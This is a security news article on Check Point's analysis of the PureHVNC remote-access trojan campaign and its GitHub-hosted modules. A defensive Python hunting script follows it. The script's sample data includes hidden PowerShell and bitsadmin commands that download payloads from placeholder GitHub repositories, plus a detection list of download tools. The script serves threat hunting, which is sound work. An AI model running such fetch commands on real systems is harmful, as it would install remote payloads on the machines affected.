PureHVNC Malware Exposed: Threat Actors Using GitHub for Distribution
Developers of the PureHVNC remote-access trojan have adopted a new level of concealment, brazenly using GitHub to host source code and modules for their malicious toolkit. That is the conclusion of Check Point Research after analysing an eight-day campaign that employed the social-engineering technique known as ClickFix.
The investigation revealed that PureHVNC’s command-and-control servers distributed links to GitHub repositories containing plugins and auxiliary components of the Pure family. Those repositories trace back to accounts associated with a developer alias, PureCoder. The analysis reconstructed not only the malware’s architecture but also its development practices and a geographic footprint of the author.
The campaign began with phishing emails directing victims to a counterfeit careers site, which served a PowerShell loader written in Rust that fetched PureHVNC payloads identified as “2a” and “amazon3.” Over eight days the operator executed multiple JavaScript-based scripts, installed PureHVNC twice, persisted it via scheduled tasks, and then deployed the Sliver framework for comprehensive network control.
The malware maintained persistent access over encrypted SSL channels, exfiltrating system telemetry—antivirus presence, privilege level, OS version and uptime—while compressing and splitting the data into 16 KB blocks to mask activity. Check Point recovered the full PureHVNC command set, configuration formats and plugin-loading mechanisms. Plugins are stored in compressed form within the registry and decompressed on demand at runtime.
A bundled PureCrypter builder lets customers choose encryption schemes, persistence techniques and injection methods; this modular design enables attackers to tailor payloads to specific objectives. Crucially, Check Point linked GitHub accounts such as testdemo345 and DFfe9ewf/PURE-CODER-1 to PureCoder, uncovering source code for TwitchBot and YouTubeBot extensions used to inflate followers, likes and ad clicks. Commit metadata points to a UTC+03:00 timezone, suggesting origins in Eastern Europe or Western Asia.
The researchers also documented how PureHVNC evades Windows’ built-in protections—disabling AMSI in memory and intercepting library-loading functions to alter process behaviour. The final phase of infection executes decrypted shellcode from a dedicated memory region, a design that obscures presence and hampers analysis.
Paradoxically, hosting components on GitHub makes the adversary infrastructure more resilient and convenient to update, yet it leaves forensic traces: new repositories, commit patterns and module rollouts provide defenders with observable signals to track and disrupt development. Check Point also discovered a multilingual PureRAT admin panel—English, Russian and Chinese—indicating the operators’ international ambitions.
Given PureHVNC’s combination of public code hosting, encrypted command channels and built-in management tools, it constitutes a serious threat. Organisations should monitor network traffic for anomalous GitHub API calls and repository downloads from endpoints, flag scheduled tasks that reference external fetches, and investigate atypical SSL connections on nonstandard ports. Hunting should also include new versions of PureCrypter and PureLogs, which commonly accompany PureRAT campaigns.
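One way to act on the scheduled-task guidance above, as an added example that is not Check Point's or the article's own tooling: a small Python hunt over scheduled-task records that flags any task action wrapping a download primitive or pointing at a GitHub URL. The task names, repository paths and account name below are constructed placeholders, not indicators from the report.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple
from urllib.parse import urlparse

# Constructed sample scheduled-task definitions (task name, action command line),
# of the kind exported with `schtasks /query /fo CSV /v` or read from task XML.
# The two benign entries mimic stock Windows tasks; the suspicious ones use
# placeholder repository paths and are NOT indicators from the article.
SAMPLE_TASKS: List[Tuple[str, str]] = [
    (r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     r"%windir%\system32\defrag.exe -c -h -k -g -$"),
    (r"\Updater",
     'powershell.exe -w hidden -c "iwr https://raw.githubusercontent.com/EXAMPLE-ACCT/repo/main/mod.bin '
     r'-OutFile $env:TEMP\m.bin"'),
    (r"\OneDrive Standalone Update Task",
     r"%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe"),
    (r"\SysHelper",
     r"cmd.exe /c bitsadmin /transfer j https://github.com/EXAMPLE-ACCT/repo/releases/download/v1/p.dll %temp%\p.dll"),
]

# Living-off-the-land download primitives commonly wrapped in persistence tasks.
FETCH_PRIMITIVES = re.compile(
    r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|start-bitstransfer|"
    r"downloadstring|downloadfile|bitsadmin|certutil|curl|wget)\b")
URL_RE = re.compile(r"(?i)https?://[^\s\"']+")
GITHUB_HOSTS = {"github.com", "raw.githubusercontent.com",
                "objects.githubusercontent.com", "api.github.com"}

@dataclass
class Finding:
    task: str
    reasons: List[str]

def analyse_task(name: str, command: str) -> List[str]:
    """Return the reasons a task action looks like a remote-fetch persistence hook."""
    reasons: List[str] = []
    m = FETCH_PRIMITIVES.search(command)
    if m:
        reasons.append(f"network fetch primitive: {m.group(0).lower()}")
    for url in URL_RE.findall(command):
        host = (urlparse(url).hostname or "").lower()
        kind = "GitHub download URL" if host in GITHUB_HOSTS else "external URL"
        reasons.append(f"{kind}: {host}")
    return reasons

def hunt(tasks: List[Tuple[str, str]]) -> List[Finding]:
    """Flag every task whose action references a network fetch or an external URL."""
    return [Finding(name, r) for name, cmd in tasks if (r := analyse_task(name, cmd))]

if __name__ == "__main__":
    for f in hunt(SAMPLE_TASKS):
        print(f.task, "->", "; ".join(f.reasons))
```

Feed it the real task inventory of a host and triage the flagged entries against known software updaters; a task that fetches from a code-hosting site at every logon is the pattern the article describes.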
Looking ahead, operators may migrate away from GitHub to alternative collaboration platforms or embed module retrieval directly into builders. Effective defence will require adaptable detection approaches that blend signature-based controls with behavioural analytics tuned to the adversary’s development patterns. Understanding those operational habits will give security teams the edge against this rapidly evolving family of threats.